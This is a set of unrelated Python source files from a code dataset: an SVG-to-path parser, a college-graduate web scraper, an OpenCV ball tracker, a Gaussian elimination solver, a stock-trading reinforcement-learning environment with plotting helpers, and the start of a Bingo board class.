self.new_path_from_node(node)\n\n x = float(node.get('x'))\n y = float(node.get('y'))\n width = node.get('width')\n if width.endswith(\"%\"):\n w = float(width[:-1])\n else:\n w = float(width)\n height = node.get('height')\n if height.endswith(\"%\"):\n h = float(height[:-1])\n else:\n h = float(height)\n # w = float(node.get('width'))\n # h = float(node.get('height'))\n\n a = []\n a.append(['M ', [x, y]])\n a.append([' l ', [w, 0]])\n a.append([' l ', [0, h]])\n a.append([' l ', [-w, 0]])\n a.append([' Z', []])\n\n newpath.set('d', simplepath.formatPath(a))\n \n SvgPath.__init__(self, newpath, node_transform)\n\n\nclass SvgLine(SvgPath):\n \"\"\"\n An SVG entity that renders a line.\n \"\"\"\n def __init__(self, node, node_transform):\n newpath = self.new_path_from_node(node)\n\n x1 = float(node.get('x1'))\n y1 = float(node.get('y1'))\n x2 = float(node.get('x2'))\n y2 = float(node.get('y2'))\n\n a = []\n a.append(['M ', [x1, y1]])\n a.append([' L ', [x2, y2]])\n\n newpath.set('d', simplepath.formatPath(a))\n \n SvgPath.__init__(self, newpath, node_transform)\n\n\nclass SvgPolyLine(SvgPath):\n \"\"\"\n An SVG entity that renders as a segmented line.\n \"\"\"\n def __init__(self, node, node_transform):\n newpath = self.new_path_from_node(node)\n pl = node.get('points', '').strip()\n\n if pl == '':\n return\n \n pa = pl.split()\n \n if not len(pa):\n return\n\n d = \"M \" + pa[0]\n \n for i in range(1, len(pa)):\n d += \" L \" + pa[i]\n \n newpath.set('d', d)\n \n SvgPath.__init__(self, newpath, node_transform)\n\n\nclass 
SvgEllipse(SvgPath):\n    \"\"\"\n    An SVG entity that renders an ellipse.\n    \"\"\"\n    def __init__(self, node, node_transform):\n        rx = float(node.get('rx', '0'))\n        ry = float(node.get('ry', '0'))\n\n        newpath = self.make_ellipse_path(rx, ry, node)\n        \n        # make_ellipse_path() returns None for degenerate (zero) radii\n        if newpath is not None:\n            SvgPath.__init__(self, newpath, node_transform)\n\n    def make_ellipse_path(self, rx, ry, node):\n        if rx == 0 or ry == 0:\n            return None\n        \n        cx = float(node.get('cx', '0'))\n        cy = float(node.get('cy', '0'))\n\n        x1 = cx - rx\n        x2 = cx + rx\n\n        d = 'M %f,%f ' % (x1, cy) + \\\n            'A %f,%f ' % (rx, ry) + \\\n            '0 1 0 %f, %f ' % (x2, cy) + \\\n            'A %f,%f ' % (rx, ry) + \\\n            '0 1 0 %f,%f' % (x1, cy)\n\n        newpath = self.new_path_from_node(node)\n        newpath.set('d', d)\n\n        return newpath\n\n\nclass SvgCircle(SvgEllipse):\n    \"\"\"\n    An SVG entity that renders a circle (an ellipse with equal radii).\n    \"\"\"\n    def __init__(self, node, node_transform):\n        rx = float(node.get('r', '0'))\n\n        newpath = self.make_ellipse_path(rx, rx, node)\n\n        if newpath is not None:\n            SvgPath.__init__(self, newpath, node_transform)\n\n\nclass SvgText(SvgIgnored):\n    \"\"\"\n    An SVG entity that renders as text.\n    \"\"\"\n    def __init__(self, node, node_transform):\n        print('unable to draw text. please convert it to a path first.')\n\n        SvgIgnored.__init__(self, node, node_transform)\n\n\nclass SvgLayerChange(SvgEntity):\n    \"\"\"\n    An SVG entity that stands in for a delay between layer changes.\n    \"\"\"\n    def __init__(self, layer_name):\n        self.layer_name = layer_name\n\n\nclass SvgParser(object):\n    \"\"\"\n    Parses an SVG.\n    \"\"\"\n    entity_map = {\n        'path': SvgPath,\n        'rect': SvgRect,\n        'line': SvgLine,\n        'polyline': SvgPolyLine,\n        'polygon': SvgPolyLine,\n        'circle': SvgCircle,\n        'ellipse': SvgEllipse,\n        'pattern': SvgIgnored,\n        'metadata': SvgIgnored,\n        'defs': SvgIgnored,\n        'eggbot': SvgIgnored,\n        ('namedview', 'sodipodi'): SvgIgnored,\n        'text': SvgText\n    }\n\n    def __init__(self, svg):\n        self.svg = svg\n        self.entities = []\n\n    def parseLengthWithUnits(self, attr):\n        \"\"\" \n        Parse an SVG value which may or may not have units attached.\n        This version is greatly simplified in that it only allows: no units,\n        units of px/pt/mm, and units of %. Everything else, it returns None for.\n        There is a more general routine to consider in scour.py if more\n        generality is ever needed.\n        \"\"\"\n        unit = 'px'\n        attr = attr.strip()\n        # print(\"attr: {}\".format(attr))\n        if attr[-2:] == 'px' \\\n                or attr[-2:] == 'pt' \\\n                or attr[-2:] == 'mm':\n            unit = attr[-2:]\n            attr = attr[:-2]\n        elif attr[-1:] == '%':\n            unit = '%'\n            attr = attr[:-1]\n\n        try:\n            value = float(attr)\n        except:\n            return None, None\n        \n        return value, unit\n\n    def getLength(self, name, default):\n        \"\"\" \n        Get the attribute with name \"name\" and default value \"default\"\n        Parse the attribute into a value and associated units. 
Then, accept\n        no units (''), units of pixels ('px'), and units of percentage ('%').\n        \"\"\"\n        attr = self.svg.get(name)\n        \n        if attr:\n            value, unit = self.parseLengthWithUnits(attr)\n            if value is None:\n                # Couldn't parse the value (a parsed value of 0 is still valid)\n                return None\n            elif (unit == '') or (unit == 'px') or (unit == 'mm') or (unit == 'pt'):\n                # print (\"name: {}, unit: {}\".format(name, unit))\n                return value\n            elif unit == '%':\n                return float(default) * value / 100.0\n            else:\n                # Unsupported units\n                return None\n        else:\n            # No width specified; assume the default value\n            return float(default)\n\n    def parse(self):\n        \"\"\"\n        Parse the SVG data into entities.\n        \"\"\"\n        # 0.28222 scale determined by comparing pixels-per-mm in a default Inkscape file.\n        # print (\"Width: {}\" .format(self.getLength('width', 354)))\n\n        # width = self.getLength('width', 354) * 0.28222\n        # height = self.getLength('height', 354) * 0.28222\n        #\n        # self.recursivelyTraverseSvg(\n        #     self.svg,\n        #     [\n        #         [0.28222, 0.0, -(width / 2.0)],\n        #         [0.0, -0.28222, (height / 2.0)]\n        #     ])\n\n        width = self.getLength('width', 800) * 0.62  # 0.522\n        height = self.getLength('height', 400) * 0.62  # 0.522\n        self.recursivelyTraverseSvg(\n            self.svg,\n            [\n                [0.62, 0.0, -(width / 2.0)],\n                [0.0, -0.62, (height / 2.0)]\n            ])\n\n    def recursivelyTraverseSvg(self, nodeList, current_transform=[[1.0, 0.0, 0.0], [0.0, -1.0, 0.0]], parent_visibility='visible'):\n        \"\"\"\n        Recursively traverse the svg file to plot out all of the\n        paths. The function keeps track of the composite transformation\n        that should be applied to each path.\n\n        This function handles path, group, line, rect, polyline, polygon,\n        circle, ellipse and use (clone) elements. Notable elements not\n        handled include text. Unhandled elements should be converted to\n        paths in Inkscape.\n        \"\"\"\n        for node in nodeList:\n            # Ignore invisible nodes\n            node_visibility = node.get('visibility', parent_visibility)\n\n            if node_visibility == 'inherit':\n                node_visibility = parent_visibility\n\n            if node_visibility == 'hidden' or node_visibility == 'collapse':\n                continue\n\n            # Apply the current matrix transform to this node's transform\n            node_transform = simpletransform.composeTransform(current_transform, simpletransform.parseTransform(node.get('transform')))\n\n            # Root and group tags\n            if node.tag == inkex.addNS('g', 'svg') or node.tag == 'g':\n                if (node.get(inkex.addNS('groupmode', 'inkscape')) == 'layer'):\n                    layer_name = node.get(inkex.addNS('label', 'inkscape'))\n                    \n                    self.entities.append(SvgLayerChange(layer_name))\n                \n                self.recursivelyTraverseSvg(node, node_transform, parent_visibility=node_visibility)\n            # Use tags\n            elif node.tag == inkex.addNS('use', 'svg') or node.tag == 'use':\n                refid = node.get(inkex.addNS('href', 'xlink'))\n                \n                if refid:\n                    # [1:] to ignore leading '#' in reference\n                    path = '//*[@id=\"%s\"]' % refid[1:]\n                    refnode = node.xpath(path)\n                    \n                    if refnode:\n                        x = float(node.get('x', '0'))\n                        y = float(node.get('y', '0'))\n                        \n                        if (x != 0) or (y != 0):\n                            node_transform = simpletransform.composeTransform(node_transform, simpletransform.parseTransform('translate(%f,%f)' % (x, y)))\n                        \n                        # TODO: this looks unnecessary\n                        node_visibility = node.get('visibility', node_visibility)\n\n                        self.recursivelyTraverseSvg(refnode, node_transform, parent_visibility=node_visibility)\n            elif not isinstance(node.tag, basestring):\n                pass\n            # Entity tags\n            else:\n                entity = self.make_entity(node, node_transform)\n                \n                if entity is None:\n                    pass\n                    # print('unable to draw object, please convert it to a path first.')\n\n    def make_entity(self, node, 
node_transform):\n \"\"\"\n Construct an appropriate entity for this SVG node.\n \"\"\"\n for nodetype in SvgParser.entity_map.keys():\n tag = nodetype\n ns = 'svg'\n \n if type(tag) is tuple:\n tag = nodetype[0]\n ns = nodetype[1]\n \n if node.tag == inkex.addNS(tag, ns) or node.tag == tag:\n cls = SvgParser.entity_map[nodetype]\n\n entity = cls(node, node_transform)\n self.entities.append(entity)\n \n return entity\n \n return None\n\n\n","repo_name":"vimior/UF-Debug-Tool","sub_path":"gcode/lib/contour/svg.py","file_name":"svg.py","file_ext":"py","file_size_in_byte":14416,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"34"} +{"seq_id":"5302447967","text":"from bs4 import BeautifulSoup\nimport requests\nimport csv\nimport time\nimport itertools\nimport os\n\n\ncity_list = [\"Phoenix\", \"Mesa\", \"Chandler\", \"San Antonio\", \"New Braunfels\", \"Philadelphia\", \"Camden\", \"Wilmington\",\n \"Denver\", \"Aurora\", \"Lakewood\", \"Boston\", \"Cambridge\", \"Newton\", \"Chicago\", \"Naperville\", \"Elgin\",\n \"New York\", \"Newark\", \"Jersey City\", \"Seattle\", \"Tacoma\", \"Bellevue\", \"Los Angeles\", \"Long Beach\",\n \"Anaheim\", \"San Francisco\", \"Oakland\", \"Berkeley\", \"Washington\", \"Arlington\", \"Alexandria\"]\n\ncity_set = {\"Phoenix\", \"Mesa\", \"Chandler\", \"San Antonio\", \"New Braunfels\", \"Philadelphia\", \"Camden\", \"Wilmington\",\n \"Denver\", \"Aurora\", \"Lakewood\", \"Boston\", \"Cambridge\", \"Newton\", \"Chicago\", \"Naperville\", \"Elgin\",\n \"New York\", \"Newark\", \"Jersey City\", \"Seattle\", \"Tacoma\", \"Bellevue\", \"Los Angeles\", \"Long Beach\",\n \"Anaheim\", \"San Francisco\", \"Oakland\", \"Berkeley\", \"Washington\", \"Arlington\", \"Alexandria\"}\n\ncity_state_map = {'Phoenix': 'AZ', 'Mesa': 'AZ', 'Chandler': 'AZ', 'San Antonio': 'TX',\n 'New Braunfels': 'TX', 'Philadelphia': 'PA', 'Camden': 'NJ', 'Wilmington': 'DE',\n 'Denver': 'CO', 'Aurora': 'CO', 'Lakewood': 'CO', 'Boston': 'MA', 'Cambridge': 'MA',\n 'Newton': 'MA', 'Chicago': 'IL', 'Naperville': 'IL', 'Elgin': 'IL', 'New York': 'NY',\n 'Newark': 'NJ', 'Jersey City': 'NJ', 'Seattle': 'WA', 'Tacoma': 'WA', 'Bellevue': 'WA',\n 'Los Angeles': 'CA', 'Long Beach': 'CA', 'Anaheim': 'CA', 'San Francisco': 'CA',\n 'Oakland': 'CA', 'Berkeley': 'CA', 'Washington': 'DC', 'Arlington': 'VA',\n 'Alexandria': 'VA'}\n\ncity_msa_map = {'Phoenix': 'Greater Phoenix Area', 'Mesa': 'Greater Phoenix Area', 'Chandler': 'Greater Phoenix Area',\n 'San Antonio': 'Greater San Antonio', 'New Braunfels': 'Greater San Antonio',\n 'Philadelphia': 'Greater Philadelphia', 'Camden': 'Greater Philadelphia',\n 'Wilmington': 'Greater Philadelphia', 'Denver': 'Greater Denver Area', 'Aurora': 'Greater Denver Area',\n 'Lakewood': 'Greater Denver Area', 'Boston': 'Greater Boston', 'Cambridge': 'Greater Boston',\n 'Newton': 'Greater Boston', 'Chicago': 'Greater Chicago Area', 'Naperville': 'Greater Chicago Area',\n 'Elgin': 'Greater Chicago Area', 'New York': 'New York Metropolitan Area',\n 'Newark': 'New York Metropolitan Area', 'Jersey City': 'New York Metropolitan Area',\n 'Seattle': 'Greater Seattle', 'Tacoma': 'Greater Seattle', 'Bellevue': 'Greater Seattle',\n 'Los Angeles': 'Greater LA Area', 'Long Beach': 'Greater LA Area', 'Anaheim': 'Greater LA Area',\n 'San Francisco': 'San Francisco Bay Area', 'Oakland': 'San Francisco Bay Area',\n 'Berkeley': 'San Francisco Bay Area', 'Washington': 'Washington Metropolitan Area',\n 'Arlington': 'Washington Metropolitan Area', 
'Alexandria': 'Washington Metropolitan Area'}\n\nnces_base_url = \"https://nces.ed.gov/collegenavigator/\"\n\nfileName = \"MSA_Finance_graduates_count.csv\"\n\n\ndef visit_college_and_extract_data(college_url):\n pass\n\n\nif __name__ == \"__main__\":\n start_time = time.time()\n total_number_of_seats = {}\n total_finance_seats = {}\n msa_total_grads = {}\n msa_finance_grads = {}\n for city in city_state_map:\n nces_url = \"https://nces.ed.gov/collegenavigator/?q=city&s=state\"\n state = city_state_map[city]\n total_number_of_seats[city] = 0\n total_finance_seats[city] = 0\n nces_url = nces_url.replace('state', state)\n nces_url = nces_url.replace('city', city)\n response = requests.get(nces_url)\n soup = BeautifulSoup(response.text, 'html.parser')\n colleges = itertools.chain(soup.findAll(class_='resultsY'), soup.findAll(class_='resultsW'))\n\n for college in colleges:\n college_url_postfix = college.find('a')['href']\n college_url = nces_base_url + college_url_postfix\n visit_college_and_extract_data(college_url)\n print(college_url)\n response = requests.get(college_url)\n soup = BeautifulSoup(response.text, 'html.parser')\n subrows = soup.findAll(class_=\"subrow\")\n Grand_total_string = \"Grand total\"\n Finance_String = \"Finance\"\n\n for subrow in subrows:\n # print(subrow)\n if Grand_total_string in subrow.find('td'):\n # print(subrow)\n st = str(subrow)\n st = st.replace(\"-\", \",\")\n st = st.replace(\"\", \"\")\n st = st.replace('
    ', \"\")\n st = st.replace('d', '')\n values = st.split('')\n local_count = 0\n for value in values:\n value = value.replace(',', '')\n local = 0\n try:\n local = int(value)\n except ValueError:\n print(\"Not an int: \" + str(value))\n local_count += local\n total_number_of_seats[city] = total_number_of_seats[city] + local_count\n print(local_count)\n\n indents = soup.findAll(class_=\"level1indent\")\n\n for indent in indents:\n # print(indent)\n # if str(indent.find('td')).find(Finance_String) != -1:\n if Finance_String in str(indent.find('td')):\n # print(indent)\n st = str(indent)\n st = st.replace(\"-\", \",\")\n st = st.replace(\"
    \", \"\")\n st = st.replace('
    ', \"\")\n st = st.replace('d','')\n values = st.split('')\n # values = values[1].split(',')\n local_count = 0\n for value in values:\n value = value.replace(',', '')\n local = 0\n try:\n local = int(value)\n except ValueError:\n print(\"Not an int: \" + str(value))\n local_count += local\n total_finance_seats[city] = total_finance_seats[city] + local_count\n print(local_count)\n\n for city in city_state_map:\n msa = city_msa_map[city]\n if msa not in msa_total_grads:\n msa_total_grads[msa] = 0\n if msa not in msa_finance_grads:\n msa_finance_grads[msa] = 0\n\n msa_total_grads[msa] = msa_total_grads[msa] + total_number_of_seats[city]\n msa_finance_grads[msa] = msa_finance_grads[msa] + total_finance_seats[city]\n\n with open(fileName, mode='w') as job_count_new_file:\n count_writer = csv.writer(job_count_new_file, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n for msa in msa_total_grads:\n count_writer.writerow([msa,msa_finance_grads[msa], msa_total_grads[msa]])\n\n\n end_time = time.time()\n print(\"Total time taken: \" + str(end_time - start_time))","repo_name":"ASUCICREPO/GPEC-Automated-pipeline","sub_path":"graduate-data.py","file_name":"graduate-data.py","file_ext":"py","file_size_in_byte":7428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"39001651616","text":"import numpy as np\nimport cv2\n\ncap = cv2.VideoCapture('leomessi.mp4')\n\nwhile(cap.isOpened()):\n ret, frame = cap.read()\n\n blurred = cv2.GaussianBlur(frame, (11, 11), 0)\n\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n\n greenLower = (29, 86, 6)\n greenUpper = (64, 255, 255)\n\n mask = cv2.inRange(gray, greenLower, greenUpper)\n mask = cv2.erode(mask, None, iterations=2)\n mask = cv2.dilate(mask, None, iterations=2)\n\n cnts = cv2.findContours(mask, 1, 2)[0]\n\n if len(cnts) > 0:\n\n for cnt in cnts:\n\n arc =0.01*cv2.arcLength(cnt, True)\n approx = cv2.approxPolyDP(cnt, arc, True)\n\n if len(approx)>10:\n\n (x,y),radius = cv2.minEnclosingCircle(cnt)\n center = (int(x),int(y))\n radius = int(radius)\n area_e = 3.14*radius*radius\n area_c = cv2.contourArea(cnt)\n #print(area_c, end = \" \")\n #print(area_e)\n\n if area_c > area_e - 2000 and area_c < area_e + 2000: \n if radius > 30 and radius < 70:\n frame = cv2.circle(frame,center,radius,(0,255,0),2)\n\n cv2.imshow('frame',frame)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n cv2.waitKey(50)\n\ncap.release()\ncv2.destroyAllWindows()\n","repo_name":"omkarghugarkar007/Autumn-of-Automation","sub_path":"OpenCV/Assignment5.1.py","file_name":"Assignment5.1.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"34"} +{"seq_id":"4758624199","text":"import numpy as np\n\nclass GaussianElimination:\n def __init__(self, A: np.ndarray, b:np.ndarray):\n self.M = A.copy()\n self.x = b.copy()\n\n\n def solve(self):\n n_rows, n_cols = self.M.shape\n # Forward Substitution\n for i in range(n_rows):\n if (self.M[i, i] == 0):\n for k in range(i + 1, n_rows):\n if (self.M[k, i] != 0):\n self.__swap_rows(i, k)\n break\n pivot = self.M[i,i]\n self.M[i] /= pivot\n self.x[i] /= pivot\n for j in range(i+1, n_rows):\n scale_f = self.M[j,i]\n self.M[j] -= scale_f*self.M[i]\n self.x[j] -= scale_f*self.x[i]\n\n # Backward Substitution\n for i in range(n_rows-1, -1, -1):\n for j in range(i):\n scale_f = self.M[j,i]\n self.M[j] -= scale_f*self.M[i]\n self.x[j] -= scale_f*self.x[i]\n # self.x= self.x[self.__x_indices]\n\n def __swap_rows(self, i, 
j):\n self.M[[i,j]] = self.M[[j,i]]\n self.x[[i,j]] = self.x[[j,i]]\n","repo_name":"Dhavaleswar/NumericalAlgos","sub_path":"Algos/GaussianElemination.py","file_name":"GaussianElemination.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"71491812898","text":"import pandas as pd\nimport os\n\ndef load_data(months, instrument='AMZN'):\n ''' Returns pandas dataframe for one instrument\n Inputs:\n months - list of month ints to be loaded over the two years e.g. [11, 12, 13, 14]\n instrument - str instrument to be loaded in for those months e.g. 'GOOG'\n Outputs:\n data - pd.DataFrame\n '''\n data = pd.DataFrame()\n \n for month in months:\n try:\n # Create path regardless of os system\n path_name = os.path.join(os.getcwd(), 'data', instrument, f'{month}.csv')\n monthly_data = pd.read_csv(path_name)\n except:\n raise FileNotFoundError(\"Refer to generate_data script to obtain data.\")\n \n # Assuming we only want to keep time, close and volume - removing open, high and low\n data = pd.concat([data, monthly_data[['time', 'close', 'volume']]], axis=0)\n \n # Sort by time and reset index\n data['time'] = pd.to_datetime(data.time)\n return data.sort_values('time').reset_index().drop('index', axis=1)\n\n############################################################################\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nSMALL, MED, LARGE = 22, 28, 34\nLW = 1.5\nplt.rc('xtick',labelsize=SMALL)\nplt.rc('ytick',labelsize=SMALL)\n\nSELL, HOLD, BUY = 0, 1, 2\n\ndef continuous_actions(target):\n ''' Input: Target actions (continuous space)\n \n Output: Returns the indexes where a BUY, HOLD or SELL occurs'''\n buy_indexes = []\n buy2_indexes = []\n sell_indexes = []\n sell2_indexes = []\n\n for interval in range(1, len(target)):\n diff = target[interval] - target[interval - 1]\n sign = target[interval] * target[interval - 1]\n\n if diff == 0:\n continue\n\n if diff > 0 and sign >= 0:\n buy_indexes.append(interval)\n elif diff > 0 and sign < 0:\n buy2_indexes.append(interval)\n elif diff < 0 and sign >= 0:\n sell_indexes.append(interval)\n elif diff < 0 and sign < 0:\n sell2_indexes.append(interval)\n \n return buy_indexes, buy2_indexes, sell_indexes, sell2_indexes\n \ndef plot(prices, target_positions=[], portfolio_values=[], title='', filename='', right_y_adjust=1.07, legend_loc='upper left',\n cont=False):\n ''' Output a graph of prices and optionally positions and portfolio values. Will save if filename provided \n Inputs:\n NECESSARY ARGUMENTS:\n prices - array of stock prices e.g. [1.02, 1.03, 1.01, 1.03, 1.05]\n \n OPTIONAL ARGUMENTS:\n target_positions - array of target positions in {0, 1, 2}, equal in length to prices e.g. [0, 0, 1, 1, -1]\n portfolio_values - array of portfolio values, equal in length to prices e.g. [100.00, 99.89, 99.93, 100.02, 100.10]\n title - string title e.g. 'Test Title'\n filename - string filename, plot will be saved if a non-empty value is given e.g. 
'test graph'\n right_y_adjust - float for adjusting rightmost y axis if there is clipping\n legend_loc - string describing legend position according to matplotlib.pyplot legend locs\n cont - flag for continuous action space\n '''\n portfolio_values = list(portfolio_values)\n target_positions = list(target_positions)\n prices_colour, portfolio_colour, buy_colour, sell_colour = 'C0', 'C1', '#49E20E', '#FF0000'\n \n fig, ax1 = plt.subplots(figsize=(18, 6))\n ax2 = ax1.twinx()\n ax1.set_zorder(ax2.get_zorder()+1)\n ax1.patch.set_visible(False)\n ax1.spines['top'].set_color('none')\n ax2.spines['top'].set_color('none')\n \n # Plot positions\n if target_positions:\n \n # if the agent has continuous action space\n if cont:\n buy_indexes, buy2_indexes, sell_indexes, sell2_indexes = continuous_actions(target_positions)\n else:\n buy_indexes = np.where(np.diff(target_positions) == 1)[0] + 1\n buy2_indexes = np.where(np.diff(target_positions) == 2)[0] + 1\n sell_indexes = np.where(np.diff(target_positions) == -1)[0] + 1\n sell2_indexes = np.where(np.diff(target_positions) == -2)[0] + 1\n buys = np.take(prices, buy_indexes, 0)\n buys2 = np.take(prices, buy2_indexes, 0)\n sells = np.take(prices, sell_indexes, 0)\n sells2 = np.take(prices, sell2_indexes, 0)\n \n first = target_positions[0]\n if first == BUY:\n ax1.scatter([0], prices[0], zorder=10, s=150, edgecolors='black', linewidths=0.5, marker='o', alpha=0.7, c=buy_colour)\n elif first == SELL:\n ax1.scatter([0], prices[0], zorder=10, s=150, edgecolors='black', linewidths=0.5, marker='o', alpha=0.7, c=sell_colour)\n \n ax1.scatter(buy2_indexes, buys2, zorder=10, s=200, edgecolors='black', linewidths=0.5, marker='^', alpha=0.7,\n label='Buy x2', c=buy_colour)\n ax1.scatter(buy_indexes, buys, zorder=10, s=150, edgecolors='black', linewidths=0.5, marker='o', alpha=0.7,\n label='Buy', c=buy_colour)\n ax1.scatter(sell_indexes, sells, zorder=10, s=150, edgecolors='black', linewidths=0.5, marker='o', alpha=0.7,\n label='Sell', c=sell_colour)\n ax1.scatter(sell2_indexes, sells2, zorder=10, s=200, edgecolors='black', linewidths=0.5, marker='v', alpha=0.7,\n label='Sell x2', c=sell_colour)\n ax1.legend(frameon=False, fontsize=SMALL, loc=legend_loc)\n \n # Plot prices and portfolio values\n ax1.plot(prices, lw=LW, c=prices_colour)\n if portfolio_values:\n ax2.plot(portfolio_values, lw=LW, c=portfolio_colour)\n \n # Label\n ax1.set_title(title, fontsize=LARGE)\n ax1.set_xlabel('Index', fontsize=LARGE)\n ax1.set_ylabel('Stock Price ($)', fontsize=MED, c=prices_colour)\n ax1.tick_params(axis='y', labelcolor=prices_colour)\n \n if portfolio_values:\n ax2.set_ylabel('Portfolio Value ($)', fontsize=MED, zorder=100, c=portfolio_colour, rotation=270)\n ax2.yaxis.set_label_coords(right_y_adjust, 0.5)\n ax2.tick_params(axis='y', labelcolor=portfolio_colour)\n else:\n ax2.get_yaxis().set_visible(False)\n ax1.spines['right'].set_color('none')\n ax2.spines['right'].set_color('none')\n \n # Plot and potentially save\n plt.tight_layout()\n if filename:\n plt.savefig(f'{filename}.png', dpi=fig.dpi)\n\n plt.show()\n \n \n############################################################################\nimport gym\nfrom gym import spaces\nfrom gym.utils import seeding\n\nINITIAL_BALANCE = 10_000\nPAST_TICKS = 5\nMAX_CHANGE = 1000\n\nclass Environment(gym.Env): \n # required for stable baselines \n metadata = {'render.modes': ['human']}\n \n SELL, HOLD, BUY = 0, 1, 2\n PRICES, POSITION, BALANCE = 0, 1, 2\n \n def __init__(self, data, balance=INITIAL_BALANCE, transaction_cost=0.001, 
i=0, position=1, past_ticks=PAST_TICKS,\n train=False):\n if isinstance(data, pd.DataFrame) or isinstance(data, pd.Series):\n raise ValueError('Only lists or arrays allowed')\n \n self.logger = []\n self.epoch_count = 0\n self.step_count = 0\n self.train = train\n \n self.past_ticks = past_ticks\n self.curr_step = self.past_ticks+1\n self.initial_balance = self.balance = balance\n \n self.done = False\n self.data = data\n self.position = position\n self.transaction_cost = transaction_cost\n self.cumulative_tc = 0\n self._seed()\n \n # Sell, Hold, Buy == 0, 1, 2 \n self.action_space = spaces.Discrete(3)\n\n # Observation space has past_ticks prices up to and included current price, then position\n self.observation_space = spaces.Box(low=-MAX_CHANGE, high=MAX_CHANGE, shape = (self.past_ticks+1, ))\n\n def _next_observation(self): \n '''Getting the next observation'''\n \n # Convert frame into returns\n # These two lines don't work for the DQN\n frame = np.array(self.data[self.curr_step - self.past_ticks: self.curr_step + 1])###################################\n frame = np.diff(frame) / frame[:-1] * 100\n \n # This line does for some reason\n #frame = np.array(self.data[self.curr_step - self.past_ticks + 1: self.curr_step + 1])\n \n obs = np.append(frame, [self.position], axis=0)\n return obs\n\n def _take_action(self, action):\n curr_price = self.data[self.curr_step]\n \n # Perform position transition (transaction cost is a proportion of price)\n self.balance -= curr_price * self.transaction_cost * abs(action - self.position)\n \n # A Buy\n if (action == self.BUY and self.position == self.HOLD) or (action == self.HOLD and self.position == self.SELL):\n self.balance -= curr_price\n self.cumulative_tc += 1\n \n # A Sell\n elif (action == self.SELL and self.position == self.HOLD) or (action == self.HOLD and self.position == self.BUY):\n self.balance += curr_price\n self.cumulative_tc += 1\n \n # Flip Position\n elif abs(action - self.position) == 2:\n self.balance -= 2 * (action-1) * curr_price\n self.cumulative_tc += 1\n \n # Update position and time\n self.position = action\n self.curr_step += 1\n \n def step(self, action):\n ''' Updates environment with action taken, returns new state and reward from state transition ''' \n prior_portfolio_value = self.get_portfolio_value()\n\n # Take action\n self._take_action(action)\n \n # current portfolio value\n self.portfolio_value = self.get_portfolio_value()\n \n # the change in portfolio value\n reward = self.portfolio_value - prior_portfolio_value \n # Percentange change from initial portfolio value\n #reward = 100 * ((self.portfolio_value/self.initial_balance) - 1) \n self.logger.append([self.epoch_count, reward, self.portfolio_value, self.cumulative_tc, self.curr_step])\n self.step_count += 1\n \n # Are we done?\n if self.balance <= 0:\n self.done = True\n reward = -1e6\n if self.curr_step >= len(self.data) - 2:\n self.done = True\n if self.train and self.step_count >= 10_000:\n self.done = True\n \n obs = self._next_observation()\n # required to return: observation, reward, done, info\n return obs, reward, self.done, {\"logs\": self.logger}\n \n def get_portfolio_value(self):\n ''' Returns current portfolio value '''\n curr_price = self.data[self.curr_step]\n \n if self.position == self.BUY:\n return self.balance + curr_price\n \n elif self.position == self.SELL:\n return self.balance - curr_price\n \n return self.balance\n \n def reset(self, rand_start=True):\n '''Reset everything as if we just started (for a new episode)'''\n self.position = 
self.HOLD\n        self.balance = self.initial_balance\n        self.portfolio_value = self.balance\n        self.done = False\n        self.curr_step = np.random.randint(self.past_ticks, len(self.data)-10_000) if rand_start else self.past_ticks+1\n        \n        self.epoch_count += 1\n        self.cumulative_tc = 0\n        \n        if self.train:\n            self.step_count=0\n        \n        obs = self._next_observation()  \n        return obs  \n\n    def save_portfolio(self, mode='human'):\n        with open('output.csv', 'a') as file:\n            file.write(f'{self.curr_step},{self.portfolio_value},{self.balance}\\n')\n    \n    def _seed(self, seed=None):\n        self.np_random, seed = seeding.np_random(seed)\n        return [seed]\n    \n    def __repr__(self):\n        return f'Balance: ${round(self.balance, 2)}, Price: ${round(self.data[self.curr_step], 2)}, ' +\\\n               f'Position: {self.position}'\n    \n    def get_data(self):\n        ''' Returns curr_price, balance, portfolio_value '''\n        return self.data[self.curr_step], self.get_portfolio_value()\n\n############################################################################\nimport os\ndef write_to_logs(logs, filename):\n    # columns: [epoch, reward, portfolio, cumulative_tc, curr_step]\n    if not os.path.exists(f'./logs'):\n        os.makedirs(f'./logs')\n    path = f\"logs/{filename}.csv\"\n    logs = pd.DataFrame(logs) \n    logs.to_csv(path, header=[\"epoch\", \"reward\", \"portfolio\", \"cumulative_tc\", \"curr_step\"], index=False)\n\ndef moving_average(values, window=10):\n    \"\"\"\n    Smooth values by doing a moving average\n    :param values: (numpy array)\n    :param window: (int)\n    :return: (numpy array)\n    \"\"\"\n    weights = np.repeat(1.0, window) / window\n    return np.convolve(values, weights, 'valid')  \n    \ndef plot_k_timesteps(logs, k=100, y_col=\"reward\", window=100):\n    ''' logs - the file where logs are stored\n        k - log at each k timesteps  \n        y_col - reward or portfolio\n        window - window to average over'''\n    df = pd.read_csv(logs)\n    # keep every k-th row in a plain variable (assigning to df.new only attaches\n    # an ad-hoc attribute to the DataFrame)\n    df_k = df.iloc[::k, :]\n    x = np.arange(0, len(df_k))\n    y = df_k[y_col]\n    y = moving_average(y, window=window)\n    \n    # Truncate x\n    x = x[len(x) - len(y):]\n\n    #plots reward at each k timestep\n    fig, ax = plt.subplots(figsize=(14,8))\n    plt.plot(x, y)\n    \n    ax.set_title(f\"{y_col} at each timestep\", fontsize=22)\n    ax.set_xlabel('timestep', fontsize=20)\n    ax.set_ylabel(y_col, fontsize=20)\n","repo_name":"YAOS5/Amazon-Trading-Bot","sub_path":"ads_utils.py","file_name":"ads_utils.py","file_ext":"py","file_size_in_byte":13657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} {"seq_id":"72266551139","text":"import os\nimport numpy as np\n\nclass BingoBoard():\n\n\t# Python does not overload methods: a second __init__ definition silently\n\t# replaces the first, so the initial state is taken as an optional argument\n\tdef 